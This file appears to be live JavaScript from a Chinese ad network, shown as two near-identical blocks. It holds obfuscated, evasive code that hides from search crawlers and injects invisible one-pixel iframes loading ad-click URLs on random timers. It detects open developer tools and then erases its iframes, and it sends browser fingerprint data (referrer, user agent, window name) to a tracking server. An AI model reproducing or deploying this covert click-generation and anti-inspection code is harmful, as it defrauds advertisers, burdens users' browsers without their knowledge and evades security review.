;setTimeout(function(){
var ua = navigator.userAgent,win=window,doc=document;win['__test15_exist']=true;
if(/Baiduspider|BingPreview|YisouSpider|Googlebot|MsnBot|Sogou web spider/.test(ua))return;
if(/AppleWebKit.*Mobile/i.test(ua)||/MIDP|MicroMessenger|SymbianOS|NOKIA|SAMSUNG|LG|NEC|TCL|Alcatel|BIRD|DBTEL|Dopod|PHILIPS|HAIER|LENOVO|MOT-|Nokia|SonyEricsson|SIE-|Amoi|ZTE/.test(ua)||/Android|Windows Phone|iPod|BlackBerry/i.test(ua)){var wapJs,wapNode;(wapJs=doc.createElement("script")).src="//ivy.pconline.com.cn/show?id=test.wap.test15.&media=js&channel=dynamic&";wapNode=doc.getElementsByTagName("script")[0];wapNode.parentNode.insertBefore(wapJs,wapNode); return;}
if(/^\x74e\x73t15(\x53h\x6fw|\x43\x6ck)\x49f\x72/.test(win.name)){
    var ch=5422;if(/\/autox\/x\.html/.test(win.name))ch=5547;if(/Chrome\/31\.0\.1650\.63/.test(ua))ch=5596;if(/Qt\/\d\..+?Safari/.test(ua))ch=5601;if(/195437|186537|378595|329087/.test(win.name))ch=5597;if(!/#ad=0000#ad=0000/.test(location.hash))location.replace("//count6.pconline.com.cn/count.php?channel="+ch+"&content="+escape("@s131,p==t:"+[win.parent==win.top,win.parent==win]+";his:"+history.length+";links:"+doc.links.length+";hash:"+location.hash +";frame:"+ doc.getElementsByTagName("iframe").length +";wn:"+unescape(unescape(win.name))+";ref:"+doc.referrer+";ua:"+ua+",br:"+[!!win.attachEvent,!!win.postMessage]));return;}
    var now = new Date();
    if(/corp\.|zhaopin\.|ued\.|cms\.|zzb\.|arch\.|zzsvn\.|play\d+\./.test(location.host)|| 0<win['\x64\x6fcu\x6de\x6et']['\x72e\x66e\x72r\x65r'].indexOf('\x6dia\x6f\x7ahe\x6e\x2ec\x6f\x6d')||0<win['\x64\x6fcu\x6de\x6et']['\x72e\x66e\x72r\x65r'].indexOf('\x74o\x6eg\x6ai\x2eb\x61i\x64u\x2ec\x6fm')||0<win['\x64\x6fcu\x6de\x6et']['\x72e\x66e\x72r\x65r'].indexOf('\x77\x77w\x2e\x67o\x6f\x67\x6ce\x2ec\x6f\x6d\x2fa\x6ea\x6c\x79t\x69c\x73')||0<win['\x64\x6fcu\x6de\x6et']['\x72e\x66e\x72r\x65r'].indexOf('\x75\x6e\x69on\x2ebai\x64u\x2eco\x6d') || location.pathname=='/' || /#ad=0000/.test(location.hash)) return;
    if(/Chrome\/(30.0.1599.101|30.0.0.0|43.0.2357.130|42.0.2307.2|22.0.1229.94)|Firefox|iPad|UBrowser/.test(ua)) return;
    var pos = {w:doc.documentElement.clientWidth||doc.body.clientWidth,h:doc.documentElement.clientHeight||doc.body.clientHeight}, ivy_div = doc.getElementById("ivy_div");
    if(ivy_div==null){ivy_div = doc.createElement("div");ivy_div.id="ivy_div";doc.body.insertBefore(ivy_div,doc.body.firstChild)};
    ivy_div.style.cssText = "width:1px;height:0;overflow:hidden;position:absolute;display:block";
    if(!win.ivyTastTimes){
        var iframe,preTime=1*now, curTime, re=/pcivy/, c=0, ivyMouseTag=0; win.ivyTastTimes={};
        ivy_div.innerHTML = '<iframe src="//www1.pconline.com.cn/test/msg/pc.html" id="jipm_pcchild"></iframe><iframe src="//www1.pcauto.com.cn/test/msg/auto.html" id="jipm_atchild"></iframe><iframe src="//www1.pclady.com.cn/test/msg/lady.html" id="jipm_ldchild"></iframe><iframe src="//www1.pcbaby.com.cn/test/msg/baby.html" id="jipm_bbchild"></iframe><iframe src="//www1.pchouse.com.cn/test/msg/house.html" id="jipm_hschild"></iframe>';
        if(win.console){re.toString = function (){ ++c; if(c>1)clear(); return ''}; setTimeout(function(){console.log(re);},1000)}
        if(doc.getElementById('f\x5f\x69\x66\x72ame')){
          iframe = doc.getElementById('f\x5f\x69\x66\x72ame').contentWindow.document;
          bind(iframe,'keydown', clear);
        }
        bind(doc,'mousemove',fn); bind(doc,'keydown',function(e){ ivyMouseTag=1;e = e||event; if(e.keyCode==123) clear(); });
        bind(win,'message',function(e){ e=e||win.event; var msg = e.data; if(/(__v.+?)=([^;]*)/.test(msg)){ pMessage('jipm_pcchild',msg); pMessage('jipm_atchild',msg); pMessage('jipm_ldchild',msg); pMessage('jipm_bbchild',msg); pMessage('jipm_hschild',msg);}});
        setTimeout(watcher,1000); setTimeout(function(){ if(!ivyMouseTag){ unbind(doc,'mousemove',fn); clear();}},6000);
        function pMessage(iid,msg){try{document.getElementById(iid).contentWindow.postMessage(msg,'*');}catch(e){}}
        function fn(){ var curTime = new Date()*1; ivyMouseTag = 1;if(curTime - preTime > 1000){ preTime = curTime; watcher();}}
        function watcher(){if(win.outerHeight&&win.innerHeight&&win.outerHeight-Math.floor((win.outerWidth-10)/win.innerWidth*win.innerHeight)>200)clear();}
        function clear(){ ivy_div.innerHTML=''; for(var k in ivyTastTimes){ clearTimeout(ivyTastTimes[k]);} }
    }
    !function(){
        var idx4show, i, srcs=["http://ivy.pconline.com.cn/adpuba/click?id=qw.search.test15.&adid=227438&watch=0","{SRC2}","{SRC3}","{SRC4}","{SRC5}","{SRC6}","{SRC7}","{SRC8}","{SRC9}","{SRC10}","{SRC11}","{SRC12}","{SRC13}","{SRC14}","{SRC15}","{SRC16}","{SRC17}","{SRC18}","{SRC19}","{SRC20}","{SRC21}","{SRC22}","{SRC23}","{SRC24}","{SRC25}","{SRC26}","{SRC27}","{SRC28}","{SRC29}","{SRC30}","{SRC31}","{SRC32}","{SRC33}","{SRC34}","{SRC35}","{SRC36}","{SRC37}","{SRC38}","{SRC39}","{SRC40}","{SRC41}","{SRC42}","{SRC43}","{SRC44}","{SRC45}","{SRC46}","{SRC47}","{SRC48}","{SRC49}","{SRC50}","{SRC51}","{SRC52}","{SRC53}","{SRC54}","{SRC55}","{SRC56}","{SRC57}","{SRC58}","{SRC59}","{SRC60}","{SRC61}","{SRC62}","{SRC63}","{SRC64}","{SRC65}","{SRC66}","{SRC67}","{SRC68}","{SRC69}","{SRC70}","{SRC71}","{SRC72}","{SRC73}","{SRC74}","{SRC75}","{SRC76}","{SRC77}","{SRC78}","{SRC79}","{SRC80}","{SRC81}","{SRC82}","{SRC83}","{SRC84}","{SRC85}","{SRC86}","{SRC87}","{SRC88}","{SRC89}","{SRC90}","{SRC91}","{SRC92}","{SRC93}","{SRC94}","{SRC95}","{SRC96}","{SRC97}","{SRC98}","{SRC99}","{SRC100}"];
        if(win.__ivyTest15Count__ && __ivyTest15Count__ instanceof Array && __ivyTest15Count__.length > 0) {srcs = __ivyTest15Count__.concat(srcs);win.__ivyTest15Count__=[];}
        var firstSrc=srcs[0]; if(firstSrc.indexOf('click?id=')>-1){firstSrc = firstSrc.replace('adpuba/','');(win["wap"+1*new Date()]=new Image()).src = firstSrc;}
        for(i=0;i<srcs.length;i++){
            var src = srcs[i];if(/^{SRC/.test(src)) break;
            if(src==null || src=="" || !/\/\//i.test(src)) continue;
            if(location.protocol=='https:')if(!/^https/i.test(src)) continue;
            idx4show = new Date()*1 + Math.floor(Math.random()*100000) + i;
            if(/\/\/(rr|ar)\..+?\.com\/u\/|rr\.jsp\?/.test(src)){
                var rdTime = /&delay=\d+/i.test(src) ? 8000 + Math.floor(Math.random()*5000) : Math.floor(Math.random()*1500);
                src = src.replace(/&delay=\d+/i,'');
                !function(s){ ivyTastTimes["t"+idx4show] = setTimeout(function(){show(s);},rdTime)}(src);
            }
        }
        function show(src){
            try{
            var div=doc.createElement("div"),ifr,ivyIds,ivyId;
            ivyIds = src.match(/(\d+)(?:$|&)/);
            ivyId = ivyIds ? ivyIds[1].split("").reverse().join("") : '';
            if(win._tmpIvyIDs && ivyId)if(win._tmpIvyIDs.indexOf(ivyId) > -1)return;
            div.innerHTML = "\x3ci\x46ra\x4de name=\"test15ShowIfr"+ ivyId +"-"+ src.replace(/\/\/(rr|ar)\..+?\.com\/u\//,"").replace(/\.html\?\d+/,"")+"-"+location.href+"-"+doc.referrer+"-"+(win==top&&win==parent) +"\" width="+ pos.w +" height="+ pos.h +" id=_ivf000"+idx4show+" src='"+src+"'\x3e\x3c/i\x46ra\x4de\x3e";
            ifr = ivy_div.appendChild(div.firstChild);
            }catch(err){};
            setTimeout(function(){try{ifr.parentNode.removeChild(ifr)}catch(err){}},40*1000);
        }
    }();
    function bind(o,type,fn){if(o.addEventListener){o.addEventListener(type,fn,false)}else if(o.attachEvent){o.attachEvent("on"+type,fn)}else{o["on"+type] = fn}}
    function unbind(o,type,fn){if(o.removeEventListener){o.removeEventListener(type,fn,false)}else if(o.detachEvent){o.detachEvent("on"+type,fn)}else{o["on"+type] = null}}
},1);
;setTimeout(function(){
var ua = navigator.userAgent,win=window,doc=document;win['__test15_exist']=true;
if(/Baiduspider|BingPreview|YisouSpider|Googlebot|MsnBot|Sogou web spider/.test(ua))return;
if(/AppleWebKit.*Mobile/i.test(ua)||/MIDP|MicroMessenger|SymbianOS|NOKIA|SAMSUNG|LG|NEC|TCL|Alcatel|BIRD|DBTEL|Dopod|PHILIPS|HAIER|LENOVO|MOT-|Nokia|SonyEricsson|SIE-|Amoi|ZTE/.test(ua)||/Android|Windows Phone|iPod|BlackBerry/i.test(ua)){var wapJs,wapNode;(wapJs=doc.createElement("script")).src="//ivy.pconline.com.cn/show?id=test.wap.test15.&media=js&channel=dynamic&";wapNode=doc.getElementsByTagName("script")[0];wapNode.parentNode.insertBefore(wapJs,wapNode); return;}
if(/^\x74e\x73t15(\x53h\x6fw|\x43\x6ck)\x49f\x72/.test(win.name)){
    var ch=5422;if(/\/autox\/x\.html/.test(win.name))ch=5547;if(/Chrome\/31\.0\.1650\.63/.test(ua))ch=5596;if(/Qt\/\d\..+?Safari/.test(ua))ch=5601;if(/195437|186537|378595|329087/.test(win.name))ch=5597;if(!/#ad=0000#ad=0000/.test(location.hash))location.replace("//count6.pconline.com.cn/count.php?channel="+ch+"&content="+escape("@s131,p==t:"+[win.parent==win.top,win.parent==win]+";his:"+history.length+";links:"+doc.links.length+";hash:"+location.hash +";frame:"+ doc.getElementsByTagName("iframe").length +";wn:"+unescape(unescape(win.name))+";ref:"+doc.referrer+";ua:"+ua+",br:"+[!!win.attachEvent,!!win.postMessage]));return;}
    var now = new Date();
    if(/corp\.|zhaopin\.|ued\.|cms\.|zzb\.|arch\.|zzsvn\.|play\d+\./.test(location.host)|| 0<win['\x64\x6fcu\x6de\x6et']['\x72e\x66e\x72r\x65r'].indexOf('\x6dia\x6f\x7ahe\x6e\x2ec\x6f\x6d')||0<win['\x64\x6fcu\x6de\x6et']['\x72e\x66e\x72r\x65r'].indexOf('\x74o\x6eg\x6ai\x2eb\x61i\x64u\x2ec\x6fm')||0<win['\x64\x6fcu\x6de\x6et']['\x72e\x66e\x72r\x65r'].indexOf('\x77\x77w\x2e\x67o\x6f\x67\x6ce\x2ec\x6f\x6d\x2fa\x6ea\x6c\x79t\x69c\x73')||0<win['\x64\x6fcu\x6de\x6et']['\x72e\x66e\x72r\x65r'].indexOf('\x75\x6e\x69on\x2ebai\x64u\x2eco\x6d') || location.pathname=='/' || /#ad=0000/.test(location.hash)) return;
    if(/Chrome\/(30.0.1599.101|30.0.0.0|43.0.2357.130|42.0.2307.2|22.0.1229.94)|Firefox|iPad|UBrowser/.test(ua)) return;
    var pos = {w:doc.documentElement.clientWidth||doc.body.clientWidth,h:doc.documentElement.clientHeight||doc.body.clientHeight}, ivy_div = doc.getElementById("ivy_div");
    if(ivy_div==null){ivy_div = doc.createElement("div");ivy_div.id="ivy_div";doc.body.insertBefore(ivy_div,doc.body.firstChild)};
    ivy_div.style.cssText = "width:1px;height:0;overflow:hidden;position:absolute;display:block";
    if(!win.ivyTastTimes){
        var iframe,preTime=1*now, curTime, re=/pcivy/, c=0, ivyMouseTag=0; win.ivyTastTimes={};
        ivy_div.innerHTML = '<iframe src="//www1.pconline.com.cn/test/msg/pc.html" id="jipm_pcchild"></iframe><iframe src="//www1.pcauto.com.cn/test/msg/auto.html" id="jipm_atchild"></iframe><iframe src="//www1.pclady.com.cn/test/msg/lady.html" id="jipm_ldchild"></iframe><iframe src="//www1.pcbaby.com.cn/test/msg/baby.html" id="jipm_bbchild"></iframe><iframe src="//www1.pchouse.com.cn/test/msg/house.html" id="jipm_hschild"></iframe>';
        if(win.console){re.toString = function (){ ++c; if(c>1)clear(); return ''}; setTimeout(function(){console.log(re);},1000)}
        if(doc.getElementById('f\x5f\x69\x66\x72ame')){
          iframe = doc.getElementById('f\x5f\x69\x66\x72ame').contentWindow.document;
          bind(iframe,'keydown', clear);
        }
        bind(doc,'mousemove',fn); bind(doc,'keydown',function(e){ ivyMouseTag=1;e = e||event; if(e.keyCode==123) clear(); });
        bind(win,'message',function(e){ e=e||win.event; var msg = e.data; if(/(__v.+?)=([^;]*)/.test(msg)){ pMessage('jipm_pcchild',msg); pMessage('jipm_atchild',msg); pMessage('jipm_ldchild',msg); pMessage('jipm_bbchild',msg); pMessage('jipm_hschild',msg);}});
        setTimeout(watcher,1000); setTimeout(function(){ if(!ivyMouseTag){ unbind(doc,'mousemove',fn); clear();}},6000);
        function pMessage(iid,msg){try{document.getElementById(iid).contentWindow.postMessage(msg,'*');}catch(e){}}
        function fn(){ var curTime = new Date()*1; ivyMouseTag = 1;if(curTime - preTime > 1000){ preTime = curTime; watcher();}}
        function watcher(){if(win.outerHeight&&win.innerHeight&&win.outerHeight-Math.floor((win.outerWidth-10)/win.innerWidth*win.innerHeight)>200)clear();}
        function clear(){ ivy_div.innerHTML=''; for(var k in ivyTastTimes){ clearTimeout(ivyTastTimes[k]);} }
    }
    !function(){
        var idx4show, i, srcs=["https://ar.3conline.com/u/48fd6691/f3b5f805/6b1ffe9a/85f17ca0.html?131-32533477-16-462305&s","https://ar.3conline.com/u/3b75141d/ef73b248/499c74f2/10d55eb7.html?131-32533487-16-562305&s","https://ar.3conline.com/u/0029126c/7bdd1d66/eb81af40/2837860c.html?131-32533463-16-550305&s","https://ar.3conline.com/u/179e2609/80cb84d7/c39ea199/3e0b3fb7.html?131-32533475-16-242205&s","{SRC5}","{SRC6}","{SRC7}","{SRC8}","{SRC9}","{SRC10}","{SRC11}","{SRC12}","{SRC13}","{SRC14}","{SRC15}","{SRC16}","{SRC17}","{SRC18}","{SRC19}","{SRC20}","{SRC21}","{SRC22}","{SRC23}","{SRC24}","{SRC25}","{SRC26}","{SRC27}","{SRC28}","{SRC29}","{SRC30}","{SRC31}","{SRC32}","{SRC33}","{SRC34}","{SRC35}","{SRC36}","{SRC37}","{SRC38}","{SRC39}","{SRC40}","{SRC41}","{SRC42}","{SRC43}","{SRC44}","{SRC45}","{SRC46}","{SRC47}","{SRC48}","{SRC49}","{SRC50}","{SRC51}","{SRC52}","{SRC53}","{SRC54}","{SRC55}","{SRC56}","{SRC57}","{SRC58}","{SRC59}","{SRC60}","{SRC61}","{SRC62}","{SRC63}","{SRC64}","{SRC65}","{SRC66}","{SRC67}","{SRC68}","{SRC69}","{SRC70}","{SRC71}","{SRC72}","{SRC73}","{SRC74}","{SRC75}","{SRC76}","{SRC77}","{SRC78}","{SRC79}","{SRC80}","{SRC81}","{SRC82}","{SRC83}","{SRC84}","{SRC85}","{SRC86}","{SRC87}","{SRC88}","{SRC89}","{SRC90}","{SRC91}","{SRC92}","{SRC93}","{SRC94}","{SRC95}","{SRC96}","{SRC97}","{SRC98}","{SRC99}","{SRC100}"];
        if(win.__ivyTest15Count__ && __ivyTest15Count__ instanceof Array && __ivyTest15Count__.length > 0) {srcs = __ivyTest15Count__.concat(srcs);win.__ivyTest15Count__=[];}
        var firstSrc=srcs[0]; if(firstSrc.indexOf('click?id=')>-1){firstSrc = firstSrc.replace('adpuba/','');(win["wap"+1*new Date()]=new Image()).src = firstSrc;}
        for(i=0;i<srcs.length;i++){
            var src = srcs[i];if(/^{SRC/.test(src)) break;
            if(src==null || src=="" || !/\/\//i.test(src)) continue;
            if(location.protocol=='https:')if(!/^https/i.test(src)) continue;
            idx4show = new Date()*1 + Math.floor(Math.random()*100000) + i;
            if(/\/\/(rr|ar)\..+?\.com\/u\/|rr\.jsp\?/.test(src)){
                var rdTime = /&delay=\d+/i.test(src) ? 8000 + Math.floor(Math.random()*5000) : Math.floor(Math.random()*1500);
                src = src.replace(/&delay=\d+/i,'');
                !function(s){ ivyTastTimes["t"+idx4show] = setTimeout(function(){show(s);},rdTime)}(src);
            }
        }
        function show(src){
            try{
            var div=doc.createElement("div"),ifr,ivyIds,ivyId;
            ivyIds = src.match(/(\d+)(?:$|&)/);
            ivyId = ivyIds ? ivyIds[1].split("").reverse().join("") : '';
            if(win._tmpIvyIDs && ivyId)if(win._tmpIvyIDs.indexOf(ivyId) > -1)return;
            div.innerHTML = "\x3ci\x46ra\x4de name=\"test15ShowIfr"+ ivyId +"-"+ src.replace(/\/\/(rr|ar)\..+?\.com\/u\//,"").replace(/\.html\?\d+/,"")+"-"+location.href+"-"+doc.referrer+"-"+(win==top&&win==parent) +"\" width="+ pos.w +" height="+ pos.h +" id=_ivf000"+idx4show+" src='"+src+"'\x3e\x3c/i\x46ra\x4de\x3e";
            ifr = ivy_div.appendChild(div.firstChild);
            }catch(err){};
            setTimeout(function(){try{ifr.parentNode.removeChild(ifr)}catch(err){}},40*1000);
        }
    }();
    function bind(o,type,fn){if(o.addEventListener){o.addEventListener(type,fn,false)}else if(o.attachEvent){o.attachEvent("on"+type,fn)}else{o["on"+type] = fn}}
    function unbind(o,type,fn){if(o.removeEventListener){o.removeEventListener(type,fn,false)}else if(o.detachEvent){o.detachEvent("on"+type,fn)}else{o["on"+type] = null}}
},1);